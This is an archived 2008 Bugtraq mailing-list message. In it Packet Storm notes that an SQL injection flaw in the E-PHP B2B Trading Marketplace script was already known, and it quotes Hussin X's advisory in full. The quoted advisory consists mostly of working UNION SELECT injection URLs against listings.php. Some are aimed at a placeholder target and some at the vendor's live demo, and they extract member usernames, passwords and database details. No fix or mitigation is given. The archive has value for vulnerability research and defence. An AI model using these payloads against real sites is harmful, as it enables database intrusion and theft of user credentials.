| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Wed, 10 Sep 2008 12:38:48 -0400 From: packet@...ketstormsecurity.org To: hussin x <hussin.x@...il.com> Cc: submissions@...ketstormsecurity.org, secalert@...urityreason.com, exploit@...urityreason.com, exploit@...urityfocus.com, bugtraq@...urityfocus.com, news@...uriteam.com Subject: Re: E-Php B2B Trading Marketplace(cid) Remote SQL Injection Vulnerability Already discovered: http://packetstormsecurity.org/0809-exploits/ephpb2b-sql.txt cceb7b553c51129e88d5553fdcb5129d E-PHP B2B Trading Marketplace Scripts suffers from a remote SQL injection vulnerability in listings.php. Homepage: <a href="http://www.darkc0de.com/" target="ext">http://www.darkc0de.com/.</a> Authored By <a href="mailto:r45c4l[at]hotmail.com">r45c4l</a> On Wed, Sep 10, 2008 at 03:07:37PM +0300, hussin x wrote: > |___________________________________________________| > | > | E-Php B2B Trading Marketplace(cid) Remote SQL Injection Vulnerability > | > |___________________________________________________ > |---------------------Hussin X----------------------| > | > | Author: Hussin X > | > | Home : WwW.Hussin-X.CoM <http://www.hussin-x.com/> | www.tryag.cc/cc > | > | email: darkangel_g85[at]Yahoo[DoT]com > | > | > | > |___________________________________________________ > | | > | > | script : http://www.ephpscripts.com > | > |___________________________________________________| > > Exploit: > > > > www.[target].com/Script/listings.php?browse=sell&cid=-1+union+select+1,concat(es_username,0x3e,es_password),3,4,5,6,7,8+FROM+ephpb2b_members > -- > > > > > > > > L!VE DEMO: : > > INFO > > http://www.ephpscripts.com/demo/b2b/listings.php?browse=sell&cid=-1+union+select+1,concat(user(),version(),database()),3,4,5,6,7,8+FROM+ephpb2b_members > -- > > > > http://www.ephpscripts.com/demo/b2b/listings.php?browse=sell&cid=-1+union+select+1,concat(es_username,0x3e,es_password),3,4,5,6,7,8+FROM+ephpb2b_members > -- > > > > > > > > ____________________________( Greetz )_________________________________ > | > | All members of the Forum WwW.Hussin-X.CoM <http://www.hussin-x.com/> | > WwW.TrYaG.CC <http://www.tryag.cc/> > | > | My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr > | > | Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | mos_chori > |______________________________________________________________________ > > > Im IRAQi > |___________________________________________________| > | > | E-Php B2B Trading Marketplace(cid) Remote SQL Injection Vulnerability > | > |___________________________________________________ > |---------------------Hussin X----------------------| > | > | Author: Hussin X > | > | Home : WwW.Hussin-X.CoM | www.tryag.cc/cc > | > | email: darkangel_g85[at]Yahoo[DoT]com > | > | > | > |___________________________________________________ > | | > | > | script : http://www.ephpscripts.com > | > |___________________________________________________| > > Exploit: > > > > www.[target].com/Script/listings.php?browse=sell&cid=-1+union+select+1,concat(es_username,0x3e,es_password),3,4,5,6,7,8+FROM+ephpb2b_members-- > > > > > > > > L!VE DEMO: : > > INFO > > http://www.ephpscripts.com/demo/b2b/listings.php?browse=sell&cid=-1+union+select+1,concat(user(),version(),database()),3,4,5,6,7,8+FROM+ephpb2b_members-- > > > > http://www.ephpscripts.com/demo/b2b/listings.php?browse=sell&cid=-1+union+select+1,concat(es_username,0x3e,es_password),3,4,5,6,7,8+FROM+ephpb2b_members-- > > > > > > > > ____________________________( Greetz )_________________________________ > | > | All members of the Forum WwW.Hussin-X.CoM | WwW.TrYaG.CC > | > | My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr > | > | Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | mos_chori > |______________________________________________________________________ > > > Im IRAQi
Powered by blists - more mailing lists